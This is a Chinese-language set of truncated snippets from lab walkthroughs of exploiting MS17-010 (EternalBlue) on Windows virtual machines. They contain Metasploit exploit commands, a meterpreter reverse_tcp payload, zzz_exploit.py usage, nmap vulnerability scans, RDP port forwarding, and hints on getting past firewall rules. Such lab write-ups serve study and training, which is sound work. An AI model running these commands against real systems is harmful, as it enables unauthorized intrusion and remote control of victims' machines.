windows 7 攻击机2 (虚拟机) IP:192.168.1.100 windows 2008 R2 靶机(虚拟机) IP:192.168.1.200 3.2工具包 win 7 环境包: 1. python2.6 (官网有https://www.python.org/download/releases/2.6/) 2. pyWin32 v212 (官网也有:https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/) 3...
本次攻防演练将利用MS17-010(永恒之蓝)漏洞。进行渗透攻击,实现远程文件上传和下载并开启靶机远程桌面服务进行远程登录。 图1-3 使用nessus漏扫软件进行漏洞扫描,发现了严重漏洞1个,高危漏洞5个,中危漏洞和,9个,低危漏洞2个信息级别漏洞45个。 图1-4 查看漏洞详情信息,可以看到有一条高危漏洞名为MS17-010永恒...
2. 下载的靶机系统较新,漏洞已修复无法利用,建议使用2009年发行的版本或者2017年之前的版本; 3. 防火墙的干扰,包括物理机的防火墙、路由器的防火墙、靶机的防火墙和主机的防火墙,通过我实践发现,当创建虚拟机时将网络设置为桥接模式,只有靶机的防火墙会影响复现结果; 4. metasploit框架集成的MS17-010不太稳定,建立ses...
如上图所示,脚本下载并复制到SMB目录下成功 8.接下来我们使用exploit模块(步骤同上,原理同上)---已知靶机是32位的操作系统,我们用常32位的脚本来入侵操作系统 msfconsolesearch eternalblue #或者search ms17-010 use exploit/windows/smb/eternalblue_doublepulsarset DOUBLEPULSARPATH /usr/share/metasploit-framework/mo...
ms17-010 环境 攻击机:192.168.2.110 > kali 靶机:192.168.2.112 > windows2012 R2 64(启用了Guest) 工具 • NASM -http://www.nasm.us/ • Python v2.7 -https://www.python.org/download/releases/2.7/ • Metasploit Framework -https://github.com/rapid7/metasploit-framework...
利用MS17-010渗透win7(32位) 环境 靶机: win7 32位 ip 192.168.206.129 攻击机: kali ip 192.168.206.128 运行环境:VMware 工具: FinalShell 信息收集 nmap -sS -sV -Pn192.168.206.129 发现端口445可以进行测试 进入msf6命令 msfconsole 检测系统是否有漏洞...
本地kali机器的1.exe记得要开启777权限,否则,无法连接靶机。 python zzz_exploit.py 10.11.1.5 netlogon(可删除netlogon) sessions –l 确认会话是否建立 sessions -i 1(id) 链接会话 getuid ps cd “\Documents and Settings\Administrator\Desktop” 路径中间有空格得话需要加双引号 ...
Windows7靶机IP:192.168.99.119 第一步:嗅探 nmap --script smb-vuln-ms17-010 192.168.247.135 #使用nmap工具嗅探指定IP主机,是否已经开放了ms17-010漏洞的相关端口 nmap -O 192.168.99.119 查看靶机的操作系统 第二步:渗透 使用msfconsole工具进行进步渗透 ...
端口转发 靶机3389端口转发送本地的5555端口 portfwd add -l 5555 -p 3389 -r 127.0.0.1 攻击者连接本地127.0.0.1的5555端口,kali的rdesktop远程连接 rdesktop -u root -p toor 127.0.0.1:5555 LCX端口转发绕过防火墙入站规则:受害者执行如下命令 ...
check 进行检测,确认是否存在ms17_010漏洞 setpayload windows/x64/meterpreter/reverse_tcp//加载payload,设置攻击载荷。windows表示靶机操作系统、x64表示64位系统、meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用、reverse_tcp表示从靶机发起一个反向tcp连接到攻击机,默认连接端口为4444,可以...